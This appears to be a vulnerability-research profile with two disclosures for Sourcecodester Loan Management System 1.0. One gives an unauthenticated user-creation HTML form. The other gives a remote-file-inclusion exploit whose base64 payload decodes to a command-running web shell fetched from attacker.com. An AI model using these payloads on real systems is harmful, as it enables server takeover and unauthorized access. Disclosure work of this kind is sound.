Zeyad-Azima (6)

Last Login: February 24, 2023
Assessments
2
Score
6

Zeyad-Azima's Latest (2) Contributions

Sort by:
Filter by:
2
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessUnauthenticated
Technical Analysis

An Incorrect Access Control vulnerability exists in Sourcecodester Loan
Management System 1.0. The ajax.php endpoint.

  • if we take a look at the source code of the ajax.php file which is responsable for actions ( add, delete , modify users & more ).
  • we can see that there is no code to check for a session or the authentication of the user.

The attacker can send a POST requests to add users without any permissions or requirements. Also, without authentication just but send the following request or using the following HTML code:

 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://target.com/ajax.php?action=save_user" method="POST">
       <input type="hidden" name="id" value="" />
       <input type="hidden" name="name" value="CVE" />
       <input type="hidden" name="username" value="cve" />
       <input type="hidden" name="password" value="cve@password" />
       <input type="hidden" name="type" value="1" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>
2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessAuthenticated
Technical Analysis

  • A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php
    The bug is affecting the [index.php] file through [page] parameter due to unsafe usage of remotely [include] function;

  • if we tak a look at the index.php file we can see the following code:

<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>

The index file have a parameter page and by default the value is home. Then its including the home page add .php to it.

Attacker login to the panel then create a PHP file that contains malicious PHP code on a remote server then pass the malicious file URL to the target through the [page] parameter and the target execute the code which gives permissions to the attacker to do malicious activities such as ( Delete, create, modify &, etc..) on the target server and the attacker will be able to achieve RCE ( remote code execution ).

Note: To make the server execute your malicious code your code must be like that:

 <?php
 echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg==");
 ?>

E.x: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.